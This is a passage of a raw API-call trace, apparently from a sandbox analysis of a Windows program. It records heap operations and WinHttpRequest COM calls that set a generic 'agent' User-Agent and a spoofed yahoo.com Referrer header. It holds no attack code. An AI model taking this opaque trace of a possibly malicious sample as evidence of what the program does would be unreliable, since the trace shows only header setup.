Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x87f148*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x87f24c | out: rgDispId=0x87f24c*=2) returned 0x0 [0254.477] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe976b0 | out: hHeap=0xc60000) returned 1 [0254.477] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xca3298, iTInfo=0x0, lcid=0x800, ppTInfo=0x87f140 | out: ppTInfo=0x87f140*=0xe0cdb4) returned 0x0 [0254.477] ITypeInfo:RemoteGetTypeAttr (in: This=0xe0cdb4, ppTypeAttr=0x87f138, pDummy=0x356310 | out: ppTypeAttr=0x87f138, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.478] ITypeInfo:LocalGetIDsOfNames (This=0xe0cdb4) returned 0x0 [0254.478] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x0, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.478] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe65bb0 [0254.478] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x1, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.478] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xc9b318 [0254.478] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x2, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.478] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xc9b318 [0254.478] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x3, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.478] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe65bb0 [0254.478] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x4, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.478] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe65bb0 [0254.478] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x5, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.478] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe65bb0 [0254.478] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x6, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.478] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.478] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x7, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.478] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe65bb0 [0254.478] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x8, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.478] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe65bb0 [0254.478] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x9, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.478] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe65bb0 [0254.478] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0xa, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.478] ITypeInfo:LocalReleaseTypeAttr (This=0xe0cdb4) returned 0xe47b90 [0254.478] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe65bb0 [0254.478] WinHttpRequest:IUnknown:Release (This=0xe0cdb4) returned 0x1 [0254.478] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x34) returned 0xeb4f28 [0254.479] WinHttpRequest:IDispatch:Invoke (in: This=0xca3298, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x87f230*(rgvarg=([0]=0xeb4f2c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="agent", varVal2=0x0), [1]=0xeb4f3c*(varType=0x8, wReserved1=0x0, wReserved2=0x8703, wReserved3=0x4295, varVal1="User-Agent", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x87f1f8, puArgErr=0x87f240 | out: pDispParams=0x87f230*(rgvarg=([0]=0xeb4f2c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="agent", varVal2=0x0), [1]=0xeb4f3c*(varType=0x8, wReserved1=0x0, wReserved2=0x8703, wReserved3=0x4295, varVal1="User-Agent", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x87f1f8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x87f240*=0x2b5995) returned 0x0 [0254.479] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd824f0 | out: hHeap=0xc60000) returned 1 [0254.479] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a048 [0254.479] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0f0 [0254.479] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca19a8 [0254.479] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeb4f28 | out: hHeap=0xc60000) returned 1 [0254.479] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a078 | out: hHeap=0xc60000) returned 1 [0254.480] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a08 | out: hHeap=0xc60000) returned 1 [0254.480] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a078 [0254.480] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a048 | out: hHeap=0xc60000) returned 1 [0254.480] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed8220 | out: hHeap=0xc60000) returned 1 [0254.480] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b78 | out: hHeap=0xc60000) returned 1 [0254.480] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0c0 | out: hHeap=0xc60000) returned 1 [0254.480] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79f28 | out: hHeap=0xc60000) returned 1 [0254.480] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a150 | out: hHeap=0xc60000) returned 1 [0254.480] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a918 | out: hHeap=0xc60000) returned 1 [0254.480] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe832e0 | out: hHeap=0xc60000) returned 1 [0254.480] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a68 | out: hHeap=0xc60000) returned 1 [0254.480] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0f0 | out: hHeap=0xc60000) returned 1 [0254.480] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca19a8 | out: hHeap=0xc60000) returned 1 [0254.480] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a078 | out: hHeap=0xc60000) returned 1 [0254.480] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 0 [0254.480] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca19a8 [0254.480] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a078 [0254.480] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1a68 [0254.480] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a078 | out: hHeap=0xc60000) returned 1 [0254.480] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xed8220 [0254.480] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe832e0 [0254.480] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a078 [0254.480] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0f0 [0254.480] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a918 [0254.481] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a150 [0254.481] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79f28 [0254.481] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a0c0 [0254.481] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1b78 [0254.481] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a048 [0254.481] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b78 | out: hHeap=0xc60000) returned 1 [0254.481] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83308 [0254.481] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a090 [0254.481] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a180 [0254.481] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1b78 [0254.481] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a048 | out: hHeap=0xc60000) returned 1 [0254.481] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a048 [0254.481] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b78 | out: hHeap=0xc60000) returned 1 [0254.481] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a198 [0254.481] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a960 [0254.481] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a048 | out: hHeap=0xc60000) returned 1 [0254.481] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0f0 | out: hHeap=0xc60000) returned 1 [0254.481] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a078 | out: hHeap=0xc60000) returned 1 [0254.481] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a918 | out: hHeap=0xc60000) returned 1 [0254.481] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79f28 | out: hHeap=0xc60000) returned 1 [0254.481] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a150 | out: hHeap=0xc60000) returned 1 [0254.481] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0c0 | out: hHeap=0xc60000) returned 1 [0254.481] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe832e0 | out: hHeap=0xc60000) returned 1 [0254.481] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0c0 [0254.482] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1b78 [0254.482] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xd824f0 [0254.482] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x22) returned 0xe976b0 [0254.482] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xca3298, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x87f148*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x87f24c | out: rgDispId=0x87f24c*=2) returned 0x0 [0254.482] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe976b0 | out: hHeap=0xc60000) returned 1 [0254.482] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xca3298, iTInfo=0x0, lcid=0x800, ppTInfo=0x87f140 | out: ppTInfo=0x87f140*=0xe0cdb4) returned 0x0 [0254.482] ITypeInfo:RemoteGetTypeAttr (in: This=0xe0cdb4, ppTypeAttr=0x87f138, pDummy=0x356310 | out: ppTypeAttr=0x87f138, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.482] ITypeInfo:LocalGetIDsOfNames (This=0xe0cdb4) returned 0x0 [0254.482] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x0, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.482] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.482] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x1, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.482] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xc9b318 [0254.482] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x2, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.482] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xc9b318 [0254.482] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x3, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.482] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.482] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x4, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.482] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.482] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x5, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.482] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.482] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x6, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.483] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.483] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x7, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.483] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.483] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x8, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.483] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.483] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x9, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.483] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.483] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0xa, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.483] ITypeInfo:LocalReleaseTypeAttr (This=0xe0cdb4) returned 0xe47b90 [0254.483] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.483] WinHttpRequest:IUnknown:Release (This=0xe0cdb4) returned 0x1 [0254.483] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x34) returned 0xeb4f28 [0254.483] WinHttpRequest:IDispatch:Invoke (in: This=0xca3298, dispIdMember=2, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x87f230*(rgvarg=([0]=0xeb4f2c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="http://www.yahoo.com", varVal2=0x0), [1]=0xeb4f3c*(varType=0x8, wReserved1=0x0, wReserved2=0x8703, wReserved3=0x4295, varVal1="Referrer", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x87f1f8, puArgErr=0x87f240 | out: pDispParams=0x87f230*(rgvarg=([0]=0xeb4f2c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="http://www.yahoo.com", varVal2=0x0), [1]=0xeb4f3c*(varType=0x8, wReserved1=0x0, wReserved2=0x8703, wReserved3=0x4295, varVal1="Referrer", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x87f1f8*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x87f240*=0x2b5995) returned 0x0 [0254.483] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd824f0 | out: hHeap=0xc60000) returned 1 [0254.484] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79f28 [0254.484] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a918 [0254.484] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1a08 [0254.484] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeb4f28 | out: hHeap=0xc60000) returned 1 [0254.484] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0c0 | out: hHeap=0xc60000) returned 1 [0254.484] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1b78 | out: hHeap=0xc60000) returned 1 [0254.484] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0c0 [0254.484] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79f28 | out: hHeap=0xc60000) returned 1 [0254.484] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed8220 | out: hHeap=0xc60000) returned 1 [0254.484] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a68 | out: hHeap=0xc60000) returned 1 [0254.484] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a180 | out: hHeap=0xc60000) returned 1 [0254.484] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a090 | out: hHeap=0xc60000) returned 1 [0254.484] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a960 | out: hHeap=0xc60000) returned 1 [0254.484] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a198 | out: hHeap=0xc60000) returned 1 [0254.484] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83308 | out: hHeap=0xc60000) returned 1 [0254.484] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca19a8 | out: hHeap=0xc60000) returned 1 [0254.484] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a918 | out: hHeap=0xc60000) returned 1 [0254.484] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a08 | out: hHeap=0xc60000) returned 1 [0254.484] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0c0 | out: hHeap=0xc60000) returned 1 [0254.484] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 0 [0254.484] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1a08 [0254.484] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0c0 [0254.484] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca19a8 [0254.485] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0c0 | out: hHeap=0xc60000) returned 1 [0254.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xed8220 [0254.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe83308 [0254.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a0c0 [0254.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a918 [0254.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a198 [0254.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a960 [0254.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a090 [0254.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xd7a180 [0254.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1a68 [0254.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79f28 [0254.485] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a68 | out: hHeap=0xc60000) returned 1 [0254.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xe832e0 [0254.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a078 [0254.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a0f0 [0254.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xca1a68 [0254.485] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79f28 | out: hHeap=0xc60000) returned 1 [0254.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd79f28 [0254.485] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca1a68 | out: hHeap=0xc60000) returned 1 [0254.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a048 [0254.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7b620 [0254.485] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79f28 | out: hHeap=0xc60000) returned 1 [0254.485] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a918 | out: hHeap=0xc60000) returned 1 [0254.486] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a0c0 | out: hHeap=0xc60000) returned 1 [0254.486] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a198 | out: hHeap=0xc60000) returned 1 [0254.486] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a090 | out: hHeap=0xc60000) returned 1 [0254.486] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a960 | out: hHeap=0xc60000) returned 1 [0254.486] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7a180 | out: hHeap=0xc60000) returned 1 [0254.486] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83308 | out: hHeap=0xc60000) returned 1 [0254.486] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xd7a180 [0254.486] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xca1a68 [0254.486] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xd824f0 [0254.486] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x22) returned 0xe976b0 [0254.486] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0xca3298, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x87f148*="SetRequestHeader", cNames=0x1, lcid=0x800, rgDispId=0x87f24c | out: rgDispId=0x87f24c*=2) returned 0x0 [0254.486] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe976b0 | out: hHeap=0xc60000) returned 1 [0254.486] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0xca3298, iTInfo=0x0, lcid=0x800, ppTInfo=0x87f140 | out: ppTInfo=0x87f140*=0xe0cdb4) returned 0x0 [0254.486] ITypeInfo:RemoteGetTypeAttr (in: This=0xe0cdb4, ppTypeAttr=0x87f138, pDummy=0x356310 | out: ppTypeAttr=0x87f138, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.486] ITypeInfo:LocalGetIDsOfNames (This=0xe0cdb4) returned 0x0 [0254.486] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x0, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.486] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.486] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x1, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.486] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xc9b318 [0254.486] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x2, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.486] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xc9b318 [0254.486] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x3, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.487] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.487] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x4, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.487] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.487] ITypeInfo:RemoteGetFuncDesc (in: This=0xe0cdb4, index=0x5, ppFuncDesc=0x87f13c, pDummy=0x356310 | out: ppFuncDesc=0x87f13c, pDummy=0x356310*=0x3225e4) returned 0x0 [0254.487] ITypeInfo:LocalReleaseFuncDesc (This=0xe0cdb4) returned 0xe71928 [0254.487] 